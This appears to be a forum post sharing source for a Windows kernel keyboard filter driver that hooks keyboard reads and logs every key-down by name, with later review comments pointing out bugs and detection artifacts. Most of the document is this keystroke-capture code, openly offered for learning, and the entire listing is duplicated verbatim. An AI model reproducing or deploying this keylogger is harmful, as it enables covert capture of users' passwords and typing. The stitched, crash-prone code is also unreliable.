Author:cxhcxh
Learn bypass driver. Please comment more.
Code:
//////////////////////////////////////////////////////////////////////////
//作者:cxh
//
//功能:键盘过滤,监视
//
//邮箱:cxh852456@163.com
//////////////////////////////////////////////////////////////////////////
#include <ntddk.h>
#include <ntddkbd.h>
// selfdevice: the filter device object this driver creates in DriverEntry.
// targetdevice: the device object returned by IoAttachDeviceToDeviceStack,
// i.e. the device every IRP is forwarded to.
PDEVICE_OBJECT selfdevice,targetdevice;;
// The most recent IRP_MJ_READ seen by DispatchRead; Unload hands it to
// IoCancelIrp. NOTE(review): it is written and read without any lock and is
// never cleared when the IRP completes, so it can be NULL or stale when used.
PIRP pcancel;
// Shorthands meant to be used as "#pragma PAGEDCODE" etc. to choose the code
// section of the functions that follow: "PAGE", the default section, or "INIT".
#define PAGEDCODE code_seg("PAGE")
#define LOCKEDCODE code_seg()
#define INITCODE code_seg("INIT")
// Put the completion routine below in the default code section rather than
// in "PAGE"; completion routines can be called at raised IRQL.
#pragma LOCKEDCODE
// Completion routine that DispatchRead registers on every IRP_MJ_READ it
// forwards. When the read completes it looks at the first KEYBOARD_INPUT_DATA
// record in the system buffer and, for a key-down record, writes the key's
// name to the kernel debug output with DbgPrint.
//
// DeviceObject and Context are not used. Always returns
// STATUS_CONTINUE_COMPLETION so the I/O manager keeps completing the IRP.
//
// NOTE(review): every key name printed here is visible to anything that can
// read kernel debug output, so typed secrets (passwords, PINs) end up there
// in clear text. Treat a driver doing this as a keystroke-capture component
// when triaging a system.
NTSTATUS CompeleteRoutin(IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp,
IN PVOID Context
)
{
PKEYBOARD_INPUT_DATA key;
// Propagate the pending state set by the lower driver to this stack location.
if (Irp->PendingReturned==TRUE)
{
IoMarkIrpPending(Irp);
}
// NOTE(review): Irp->IoStatus.Status and Irp->IoStatus.Information are not
// checked first, so on a failed or cancelled read (or a zero-length one) the
// buffer may hold no valid record — confirm and guard before dereferencing.
// Only the first record in the buffer is examined.
key = (PKEYBOARD_INPUT_DATA)Irp->AssociatedIrp.SystemBuffer;
_try{
// Exact comparison with KEY_MAKE: records with any other flag value are
// skipped, as are records whose MakeCode is 0.
if (key->Flags==KEY_MAKE && key->MakeCode)
{
// Map the scan code to a printable key name; codes without a case are
// printed as hex by the default branch.
switch (key->MakeCode)
{
case 0x1:
DbgPrint("ESC KeyDown");
break;
case 0x2:
DbgPrint("1 KeyDown");
break;
case 0x3:
DbgPrint("2 KeyDown");
break;
case 0x4:
DbgPrint("3 KeyDown");
break;
case 0x5:
DbgPrint("4 KeyDown");
break;
case 0x6:
DbgPrint("5 KeyDown");
break;
case 0x7:
DbgPrint("6 KeyDown");
break;
case 0x8:
DbgPrint("7 KeyDown");
break;
case 0x9:
DbgPrint("8 KeyDown");
break;
case 0xA:
DbgPrint("9 KeyDown");
break;
case 0xB:
DbgPrint("0 KeyDown");
break;
case 0xC:
DbgPrint("- KeyDown");
break;
case 0xD:
DbgPrint("= KeyDown");
break;
case 0xE:
DbgPrint("BACKSPACE KeyDown");
break;
case 0xF:
DbgPrint("TAB KeyDown");
break;
case 0x10:
DbgPrint("Q KeyDown");
break;
case 0x11:
DbgPrint("W KeyDown");
break;
case 0x12:
DbgPrint("E KeyDown");
break;
case 0x13:
DbgPrint("R KeyDown");
break;
case 0x14:
DbgPrint("T KeyDown");
break;
case 0x15:
DbgPrint("Y KeyDown");
break;
case 0x16:
DbgPrint("U KeyDown");
break;
case 0x17:
DbgPrint("I KeyDown");
break;
case 0x18:
DbgPrint("O KeyDown");
break;
case 0x19:
DbgPrint("P KeyDown");
break;
case 0x1A:
DbgPrint("[ KeyDown");
break;
case 0x1B:
DbgPrint("] KeyDown");
break;
case 0x2B:
DbgPrint("\\ KeyDown");
break;
case 0x1D:
DbgPrint("LEFT CTRL KeyDown");
break;
case 0x1E:
DbgPrint("A KeyDown");
break;
case 0x1F:
DbgPrint("S KeyDown");
break;
case 0x20:
DbgPrint("D KeyDown");
break;
case 0x21:
DbgPrint("F KeyDown");
break;
case 0x22:
DbgPrint("G KeyDown");
break;
case 0x23:
DbgPrint("H KeyDown");
break;
case 0x24:
DbgPrint("J KeyDown");
break;
case 0x25:
DbgPrint("K KeyDown");
break;
case 0x26:
DbgPrint("L KeyDown");
break;
case 0x27:
DbgPrint("; KeyDown");
break;
case 0x28:
DbgPrint("' KeyDown");
break;
case 0x29:
DbgPrint("` KeyDown");
break;
case 0x2A:
DbgPrint("LEFT SHIFT KeyDown");
break;
case 0x1C:
DbgPrint("ENTER KeyDown");
break;
case 0x2C:
DbgPrint("Z KeyDown");
break;
case 0x2D:
DbgPrint("X KeyDown");
break;
case 0x2E:
DbgPrint("C KeyDown");
break;
case 0x2F:
DbgPrint("V KeyDown");
break;
case 0x30:
DbgPrint("B KeyDown");
break;
case 0x31:
DbgPrint("N KeyDown");
break;
case 0x32:
DbgPrint("M KeyDown");
break;
case 0x33:
DbgPrint(", KeyDown");
break;
case 0x34:
DbgPrint(". KeyDown");
break;
case 0x35:
DbgPrint("/ KeyDown");
break;
case 0x36:
DbgPrint("RIGHT SHIFT KeyDown");
break;
case 0x37:
DbgPrint("* KeyDown");
break;
case 0x38:
DbgPrint("LEFT ALT KeyDown");
break;
case 0x39:
DbgPrint("SPACE KeyDown");
break;
case 0x3A:
DbgPrint("CAP LOCK KeyDown");
break;
case 0x3B:
DbgPrint("F1 KeyDown");
break;
case 0x3C:
DbgPrint("F2 KeyDown");
break;
case 0x3D:
DbgPrint("F3 KeyDown");
break;
case 0x3E:
DbgPrint("F4 KeyDown");
break;
case 0x3F:
DbgPrint("F5 KeyDown");
break;
case 0x40:
DbgPrint("F6 KeyDown");
break;
case 0x41:
DbgPrint("F7 KeyDown");
break;
case 0x42:
DbgPrint("F8 KeyDown");
break;
case 0x43:
DbgPrint("F9 KeyDown");
break;
case 0x44:
DbgPrint("F10 KeyDown");
break;
case 0x45:
DbgPrint("NumLock KeyDown");
break;
// In the messages below the prefix "小键盘" means "numeric keypad".
case 0x46:
DbgPrint("小键盘 / KeyDown");
break;
case 0x47:
DbgPrint("小键盘 7 KeyDown");
break;
case 0x48:
DbgPrint("小键盘 8 KeyDown");
break;
case 0x49:
DbgPrint("小键盘 9 KeyDown");
break;
case 0x4A:
DbgPrint("小键盘 - KeyDown");
break;
case 0x4B:
DbgPrint("小键盘 4 KeyDown");
break;
case 0x4C:
DbgPrint("小键盘 5 KeyDown");
break;
case 0x4D:
DbgPrint("小键盘 6 KeyDown");
break;
case 0x4E:
DbgPrint("小键盘 + KeyDown");
break;
case 0x4F:
DbgPrint("小键盘 1 KeyDown");
break;
case 0x50:
DbgPrint("小键盘 2 KeyDown");
break;
case 0x51:
DbgPrint("小键盘 3 KeyDown");
break;
case 0x52:
DbgPrint("小键盘 0 KeyDown");
break;
case 0x53:
DbgPrint("小键盘 . KeyDown");
break;
case 0x57:
DbgPrint("F11 KeyDown");
break;
case 0x58:
DbgPrint("F12 KeyDown");
break;
default:
DbgPrint("%X",key->MakeCode);
break;
}
}
// NOTE(review): the filter expression is the constant
// EXCEPTION_CONTINUE_EXECUTION, which asks the exception dispatcher to resume
// at the faulting instruction instead of entering this handler, so the body
// below is presumably never reached and a fault would simply recur;
// EXCEPTION_EXECUTE_HANDLER is the value that runs the handler. In kernel mode
// an access to an invalid system address bugchecks rather than being caught,
// so this block is not a substitute for validating the buffer.
}_except(EXCEPTION_CONTINUE_EXECUTION)
{
DbgPrint("%x",GetExceptionCode());
}
// Let completion processing continue up the device stack.
return STATUS_CONTINUE_COMPLETION;
}
// From here on, functions are placed in the pageable "PAGE" code section.
#pragma PAGEDCODE
// Default dispatch routine: DriverEntry installs it for every major function
// code, and only IRP_MJ_READ is overridden afterwards. It passes the IRP to
// the lower device unchanged and returns whatever IoCallDriver returns.
// DeviceObject is not used; the target is the global targetdevice.
//
// NOTE(review): because it covers every major function it also receives PnP
// and power IRPs. Nothing here detaches or deletes the filter device when the
// keyboard stack is removed, and power IRPs get no special handling — confirm
// against the Windows versions this is meant to run on.
NTSTATUS
Dispatch(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp
)
{
// Reuse the current stack location for the next driver; no completion
// routine is registered on this path.
IoSkipCurrentIrpStackLocation(Irp);
return IoCallDriver(targetdevice,Irp);
}
// IRP_MJ_READ handler: remembers the IRP in the global pcancel, registers
// CompeleteRoutin as its completion routine and forwards it to the lower
// device. Returns the status of IoCallDriver. DeviceObject is not used.
//
// NOTE(review): there is no remove lock or outstanding-request count, so the
// driver cannot tell at unload time whether a forwarded read still has
// CompeleteRoutin pending on it.
NTSTATUS
DispatchRead(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp
)
{
// The three locals below are declared but never used in this function.
PIO_STACK_LOCATION irpsp;
NTSTATUS s;
PKEYBOARD_INPUT_DATA key;
//DbgPrint("read");
// Only the latest read IRP is remembered, with no synchronization.
// NOTE(review): the pointer is not cleared on completion, so it can refer to
// an IRP that has already been completed and freed.
pcancel = Irp;
// A completion routine needs its own stack location, so the current one is
// copied to the next driver instead of being skipped.
IoCopyCurrentIrpStackLocationToNext(Irp);
// IoSkipCurrentIrpStackLocation(Irp);
// Invoke CompeleteRoutin on success, on error and on cancel; no context.
IoSetCompletionRoutine(Irp,CompeleteRoutin,NULL,TRUE,TRUE,TRUE);
return IoCallDriver(targetdevice,Irp);
}
// Driver unload routine: cancels the remembered read IRP, detaches from the
// keyboard device stack and deletes the filter device. DriverObject is not
// used.
//
// NOTE(review): this teardown is unsafe as written.
//  - pcancel is NULL if no read was ever dispatched and may be stale
//    otherwise; IoCancelIrp is called on it unconditionally, and the IRP was
//    not allocated by this driver.
//  - Nothing waits for the cancelled (or any other forwarded) read to finish,
//    so CompeleteRoutin can still be called after this image is unloaded.
// Either case is a likely system crash; an unexplained bugcheck around
// keyboard input after a driver unload is worth correlating with a filter
// like this one.
VOID
Unload(
IN PDRIVER_OBJECT DriverObject
)
{
IoCancelIrp(pcancel);
IoDetachDevice(targetdevice);
IoDeleteDevice(selfdevice);
DbgPrint("Driver Unload!");
}
// Driver entry point. Installs the unload and dispatch routines, looks up
// \Device\KeyboardClass0, creates an unnamed filter device and attaches it on
// top of that keyboard device, so that reads sent to the keyboard stack pass
// through DispatchRead / CompeleteRoutin.
//
// Returns STATUS_SUCCESS when attached, the failing status of
// IoGetDeviceObjectPointer or IoCreateDevice, or
// STATUS_INSUFFICIENT_RESOURCES when the attach fails. RegistryPath is not
// used.
//
// NOTE(review): for defenders, the visible artifact is an unnamed device
// object owned by this driver sitting above \Device\KeyboardClass0; listing
// that device stack (for example with a kernel debugger's !devstack) shows
// it.
NTSTATUS
DriverEntry(
IN PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
)
{
PDEVICE_OBJECT device;
PFILE_OBJECT file;
NTSTATUS s;
UNICODE_STRING DeviceName;
ULONG i;
DbgPrint("Driver loaded!");
DriverObject->DriverUnload = Unload;
// Pass-through for every major function, then override reads.
for (i=0;i<=IRP_MJ_MAXIMUM_FUNCTION;i++)
{
DriverObject->MajorFunction[i] = Dispatch;
}
DriverObject->MajorFunction[IRP_MJ_READ]=DispatchRead;
RtlInitUnicodeString(&DeviceName,L"\\Device\\KeyboardClass0");
// On success this takes a reference on the file object, which is released
// on every path below.
s = IoGetDeviceObjectPointer(&DeviceName,FILE_ALL_ACCESS,&file,&device);
if (!NT_SUCCESS(s))
{
DbgPrint("Get Device error!");
return s;
}
// No device extension (0), no name (NULL), exclusive access (TRUE).
// NOTE(review): device->Type is the object-header type tag of the device
// object, not its DeviceType; DeviceType is overwritten after the attach
// below, but the device is first created with this value — confirm that
// device->DeviceType was intended.
s = IoCreateDevice(DriverObject,
0,
NULL,
device->Type,
device->Characteristics,
TRUE,
&selfdevice
);
if (!NT_SUCCESS(s))
{
ObDereferenceObject(file);
DbgPrint("Create Device Faile!!!");
return s;
}
// The return value is the device the filter now sits directly above; all
// dispatch routines forward to it.
targetdevice = IoAttachDeviceToDeviceStack(selfdevice,device);
if (!targetdevice)
{
IoDeleteDevice(selfdevice);
ObDereferenceObject(file);
DbgPrint("attach faile");
return STATUS_INSUFFICIENT_RESOURCES;
}
// Mirror the lower device's type, characteristics and buffering flags.
// NOTE(review): DO_DEVICE_INITIALIZING is cleared before the I/O buffering
// flags are copied, and both happen after the attach, so an IRP could arrive
// while the flags are still incomplete — the usual order is flags first,
// clear the initializing bit last.
selfdevice->DeviceType = targetdevice->DeviceType;
selfdevice->Characteristics = targetdevice->Characteristics;
selfdevice->Flags &=~DO_DEVICE_INITIALIZING;
selfdevice->Flags |=(targetdevice->Flags & (DO_DIRECT_IO | DO_BUFFERED_IO));
ObDereferenceObject(file);
DbgPrint("SUCCESS");
return STATUS_SUCCESS;
}
//作者:cxh
//
//功能:键盘过滤,监视
//
//邮箱:cxh852456@163.com
//////////////////////////////////////////////////////////////////////////
#include <ntddk.h>
#include <ntddkbd.h>
// selfdevice: the filter device object this driver creates in DriverEntry.
// targetdevice: the device object returned by IoAttachDeviceToDeviceStack,
// i.e. the device every IRP is forwarded to.
PDEVICE_OBJECT selfdevice,targetdevice;;
// The most recent IRP_MJ_READ seen by DispatchRead; Unload hands it to
// IoCancelIrp. NOTE(review): it is written and read without any lock and is
// never cleared when the IRP completes, so it can be NULL or stale when used.
PIRP pcancel;
// Shorthands meant to be used as "#pragma PAGEDCODE" etc. to choose the code
// section of the functions that follow: "PAGE", the default section, or "INIT".
#define PAGEDCODE code_seg("PAGE")
#define LOCKEDCODE code_seg()
#define INITCODE code_seg("INIT")
// Put the completion routine below in the default code section rather than
// in "PAGE"; completion routines can be called at raised IRQL.
#pragma LOCKEDCODE
// Completion routine that DispatchRead registers on every IRP_MJ_READ it
// forwards. When the read completes it looks at the first KEYBOARD_INPUT_DATA
// record in the system buffer and, for a key-down record, writes the key's
// name to the kernel debug output with DbgPrint.
//
// DeviceObject and Context are not used. Always returns
// STATUS_CONTINUE_COMPLETION so the I/O manager keeps completing the IRP.
//
// NOTE(review): every key name printed here is visible to anything that can
// read kernel debug output, so typed secrets (passwords, PINs) end up there
// in clear text. Treat a driver doing this as a keystroke-capture component
// when triaging a system.
NTSTATUS CompeleteRoutin(IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp,
IN PVOID Context
)
{
PKEYBOARD_INPUT_DATA key;
// Propagate the pending state set by the lower driver to this stack location.
if (Irp->PendingReturned==TRUE)
{
IoMarkIrpPending(Irp);
}
// NOTE(review): Irp->IoStatus.Status and Irp->IoStatus.Information are not
// checked first, so on a failed or cancelled read (or a zero-length one) the
// buffer may hold no valid record — confirm and guard before dereferencing.
// Only the first record in the buffer is examined.
key = (PKEYBOARD_INPUT_DATA)Irp->AssociatedIrp.SystemBuffer;
_try{
// Exact comparison with KEY_MAKE: records with any other flag value are
// skipped, as are records whose MakeCode is 0.
if (key->Flags==KEY_MAKE && key->MakeCode)
{
// Map the scan code to a printable key name; codes without a case are
// printed as hex by the default branch.
switch (key->MakeCode)
{
case 0x1:
DbgPrint("ESC KeyDown");
break;
case 0x2:
DbgPrint("1 KeyDown");
break;
case 0x3:
DbgPrint("2 KeyDown");
break;
case 0x4:
DbgPrint("3 KeyDown");
break;
case 0x5:
DbgPrint("4 KeyDown");
break;
case 0x6:
DbgPrint("5 KeyDown");
break;
case 0x7:
DbgPrint("6 KeyDown");
break;
case 0x8:
DbgPrint("7 KeyDown");
break;
case 0x9:
DbgPrint("8 KeyDown");
break;
case 0xA:
DbgPrint("9 KeyDown");
break;
case 0xB:
DbgPrint("0 KeyDown");
break;
case 0xC:
DbgPrint("- KeyDown");
break;
case 0xD:
DbgPrint("= KeyDown");
break;
case 0xE:
DbgPrint("BACKSPACE KeyDown");
break;
case 0xF:
DbgPrint("TAB KeyDown");
break;
case 0x10:
DbgPrint("Q KeyDown");
break;
case 0x11:
DbgPrint("W KeyDown");
break;
case 0x12:
DbgPrint("E KeyDown");
break;
case 0x13:
DbgPrint("R KeyDown");
break;
case 0x14:
DbgPrint("T KeyDown");
break;
case 0x15:
DbgPrint("Y KeyDown");
break;
case 0x16:
DbgPrint("U KeyDown");
break;
case 0x17:
DbgPrint("I KeyDown");
break;
case 0x18:
DbgPrint("O KeyDown");
break;
case 0x19:
DbgPrint("P KeyDown");
break;
case 0x1A:
DbgPrint("[ KeyDown");
break;
case 0x1B:
DbgPrint("] KeyDown");
break;
case 0x2B:
DbgPrint("\\ KeyDown");
break;
case 0x1D:
DbgPrint("LEFT CTRL KeyDown");
break;
case 0x1E:
DbgPrint("A KeyDown");
break;
case 0x1F:
DbgPrint("S KeyDown");
break;
case 0x20:
DbgPrint("D KeyDown");
break;
case 0x21:
DbgPrint("F KeyDown");
break;
case 0x22:
DbgPrint("G KeyDown");
break;
case 0x23:
DbgPrint("H KeyDown");
break;
case 0x24:
DbgPrint("J KeyDown");
break;
case 0x25:
DbgPrint("K KeyDown");
break;
case 0x26:
DbgPrint("L KeyDown");
break;
case 0x27:
DbgPrint("; KeyDown");
break;
case 0x28:
DbgPrint("' KeyDown");
break;
case 0x29:
DbgPrint("` KeyDown");
break;
case 0x2A:
DbgPrint("LEFT SHIFT KeyDown");
break;
case 0x1C:
DbgPrint("ENTER KeyDown");
break;
case 0x2C:
DbgPrint("Z KeyDown");
break;
case 0x2D:
DbgPrint("X KeyDown");
break;
case 0x2E:
DbgPrint("C KeyDown");
break;
case 0x2F:
DbgPrint("V KeyDown");
break;
case 0x30:
DbgPrint("B KeyDown");
break;
case 0x31:
DbgPrint("N KeyDown");
break;
case 0x32:
DbgPrint("M KeyDown");
break;
case 0x33:
DbgPrint(", KeyDown");
break;
case 0x34:
DbgPrint(". KeyDown");
break;
case 0x35:
DbgPrint("/ KeyDown");
break;
case 0x36:
DbgPrint("RIGHT SHIFT KeyDown");
break;
case 0x37:
DbgPrint("* KeyDown");
break;
case 0x38:
DbgPrint("LEFT ALT KeyDown");
break;
case 0x39:
DbgPrint("SPACE KeyDown");
break;
case 0x3A:
DbgPrint("CAP LOCK KeyDown");
break;
case 0x3B:
DbgPrint("F1 KeyDown");
break;
case 0x3C:
DbgPrint("F2 KeyDown");
break;
case 0x3D:
DbgPrint("F3 KeyDown");
break;
case 0x3E:
DbgPrint("F4 KeyDown");
break;
case 0x3F:
DbgPrint("F5 KeyDown");
break;
case 0x40:
DbgPrint("F6 KeyDown");
break;
case 0x41:
DbgPrint("F7 KeyDown");
break;
case 0x42:
DbgPrint("F8 KeyDown");
break;
case 0x43:
DbgPrint("F9 KeyDown");
break;
case 0x44:
DbgPrint("F10 KeyDown");
break;
case 0x45:
DbgPrint("NumLock KeyDown");
break;
// In the messages below the prefix "小键盘" means "numeric keypad".
case 0x46:
DbgPrint("小键盘 / KeyDown");
break;
case 0x47:
DbgPrint("小键盘 7 KeyDown");
break;
case 0x48:
DbgPrint("小键盘 8 KeyDown");
break;
case 0x49:
DbgPrint("小键盘 9 KeyDown");
break;
case 0x4A:
DbgPrint("小键盘 - KeyDown");
break;
case 0x4B:
DbgPrint("小键盘 4 KeyDown");
break;
case 0x4C:
DbgPrint("小键盘 5 KeyDown");
break;
case 0x4D:
DbgPrint("小键盘 6 KeyDown");
break;
case 0x4E:
DbgPrint("小键盘 + KeyDown");
break;
case 0x4F:
DbgPrint("小键盘 1 KeyDown");
break;
case 0x50:
DbgPrint("小键盘 2 KeyDown");
break;
case 0x51:
DbgPrint("小键盘 3 KeyDown");
break;
case 0x52:
DbgPrint("小键盘 0 KeyDown");
break;
case 0x53:
DbgPrint("小键盘 . KeyDown");
break;
case 0x57:
DbgPrint("F11 KeyDown");
break;
case 0x58:
DbgPrint("F12 KeyDown");
break;
default:
DbgPrint("%X",key->MakeCode);
break;
}
}
// NOTE(review): the filter expression is the constant
// EXCEPTION_CONTINUE_EXECUTION, which asks the exception dispatcher to resume
// at the faulting instruction instead of entering this handler, so the body
// below is presumably never reached and a fault would simply recur;
// EXCEPTION_EXECUTE_HANDLER is the value that runs the handler. In kernel mode
// an access to an invalid system address bugchecks rather than being caught,
// so this block is not a substitute for validating the buffer.
}_except(EXCEPTION_CONTINUE_EXECUTION)
{
DbgPrint("%x",GetExceptionCode());
}
// Let completion processing continue up the device stack.
return STATUS_CONTINUE_COMPLETION;
}
// From here on, functions are placed in the pageable "PAGE" code section.
#pragma PAGEDCODE
// Default dispatch routine: DriverEntry installs it for every major function
// code, and only IRP_MJ_READ is overridden afterwards. It passes the IRP to
// the lower device unchanged and returns whatever IoCallDriver returns.
// DeviceObject is not used; the target is the global targetdevice.
//
// NOTE(review): because it covers every major function it also receives PnP
// and power IRPs. Nothing here detaches or deletes the filter device when the
// keyboard stack is removed, and power IRPs get no special handling — confirm
// against the Windows versions this is meant to run on.
NTSTATUS
Dispatch(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp
)
{
// Reuse the current stack location for the next driver; no completion
// routine is registered on this path.
IoSkipCurrentIrpStackLocation(Irp);
return IoCallDriver(targetdevice,Irp);
}
// IRP_MJ_READ handler: remembers the IRP in the global pcancel, registers
// CompeleteRoutin as its completion routine and forwards it to the lower
// device. Returns the status of IoCallDriver. DeviceObject is not used.
//
// NOTE(review): there is no remove lock or outstanding-request count, so the
// driver cannot tell at unload time whether a forwarded read still has
// CompeleteRoutin pending on it.
NTSTATUS
DispatchRead(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp
)
{
// The three locals below are declared but never used in this function.
PIO_STACK_LOCATION irpsp;
NTSTATUS s;
PKEYBOARD_INPUT_DATA key;
//DbgPrint("read");
// Only the latest read IRP is remembered, with no synchronization.
// NOTE(review): the pointer is not cleared on completion, so it can refer to
// an IRP that has already been completed and freed.
pcancel = Irp;
// A completion routine needs its own stack location, so the current one is
// copied to the next driver instead of being skipped.
IoCopyCurrentIrpStackLocationToNext(Irp);
// IoSkipCurrentIrpStackLocation(Irp);
// Invoke CompeleteRoutin on success, on error and on cancel; no context.
IoSetCompletionRoutine(Irp,CompeleteRoutin,NULL,TRUE,TRUE,TRUE);
return IoCallDriver(targetdevice,Irp);
}
// Driver unload routine: cancels the remembered read IRP, detaches from the
// keyboard device stack and deletes the filter device. DriverObject is not
// used.
//
// NOTE(review): this teardown is unsafe as written.
//  - pcancel is NULL if no read was ever dispatched and may be stale
//    otherwise; IoCancelIrp is called on it unconditionally, and the IRP was
//    not allocated by this driver.
//  - Nothing waits for the cancelled (or any other forwarded) read to finish,
//    so CompeleteRoutin can still be called after this image is unloaded.
// Either case is a likely system crash; an unexplained bugcheck around
// keyboard input after a driver unload is worth correlating with a filter
// like this one.
VOID
Unload(
IN PDRIVER_OBJECT DriverObject
)
{
IoCancelIrp(pcancel);
IoDetachDevice(targetdevice);
IoDeleteDevice(selfdevice);
DbgPrint("Driver Unload!");
}
// Driver entry point. Installs the unload and dispatch routines, looks up
// \Device\KeyboardClass0, creates an unnamed filter device and attaches it on
// top of that keyboard device, so that reads sent to the keyboard stack pass
// through DispatchRead / CompeleteRoutin.
//
// Returns STATUS_SUCCESS when attached, the failing status of
// IoGetDeviceObjectPointer or IoCreateDevice, or
// STATUS_INSUFFICIENT_RESOURCES when the attach fails. RegistryPath is not
// used.
//
// NOTE(review): for defenders, the visible artifact is an unnamed device
// object owned by this driver sitting above \Device\KeyboardClass0; listing
// that device stack (for example with a kernel debugger's !devstack) shows
// it.
NTSTATUS
DriverEntry(
IN PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
)
{
PDEVICE_OBJECT device;
PFILE_OBJECT file;
NTSTATUS s;
UNICODE_STRING DeviceName;
ULONG i;
DbgPrint("Driver loaded!");
DriverObject->DriverUnload = Unload;
// Pass-through for every major function, then override reads.
for (i=0;i<=IRP_MJ_MAXIMUM_FUNCTION;i++)
{
DriverObject->MajorFunction[i] = Dispatch;
}
DriverObject->MajorFunction[IRP_MJ_READ]=DispatchRead;
RtlInitUnicodeString(&DeviceName,L"\\Device\\KeyboardClass0");
// On success this takes a reference on the file object, which is released
// on every path below.
s = IoGetDeviceObjectPointer(&DeviceName,FILE_ALL_ACCESS,&file,&device);
if (!NT_SUCCESS(s))
{
DbgPrint("Get Device error!");
return s;
}
// No device extension (0), no name (NULL), exclusive access (TRUE).
// NOTE(review): device->Type is the object-header type tag of the device
// object, not its DeviceType; DeviceType is overwritten after the attach
// below, but the device is first created with this value — confirm that
// device->DeviceType was intended.
s = IoCreateDevice(DriverObject,
0,
NULL,
device->Type,
device->Characteristics,
TRUE,
&selfdevice
);
if (!NT_SUCCESS(s))
{
ObDereferenceObject(file);
DbgPrint("Create Device Faile!!!");
return s;
}
// The return value is the device the filter now sits directly above; all
// dispatch routines forward to it.
targetdevice = IoAttachDeviceToDeviceStack(selfdevice,device);
if (!targetdevice)
{
IoDeleteDevice(selfdevice);
ObDereferenceObject(file);
DbgPrint("attach faile");
return STATUS_INSUFFICIENT_RESOURCES;
}
// Mirror the lower device's type, characteristics and buffering flags.
// NOTE(review): DO_DEVICE_INITIALIZING is cleared before the I/O buffering
// flags are copied, and both happen after the attach, so an IRP could arrive
// while the flags are still incomplete — the usual order is flags first,
// clear the initializing bit last.
selfdevice->DeviceType = targetdevice->DeviceType;
selfdevice->Characteristics = targetdevice->Characteristics;
selfdevice->Flags &=~DO_DEVICE_INITIALIZING;
selfdevice->Flags |=(targetdevice->Flags & (DO_DIRECT_IO | DO_BUFFERED_IO));
ObDereferenceObject(file);
DbgPrint("SUCCESS");
return STATUS_SUCCESS;
}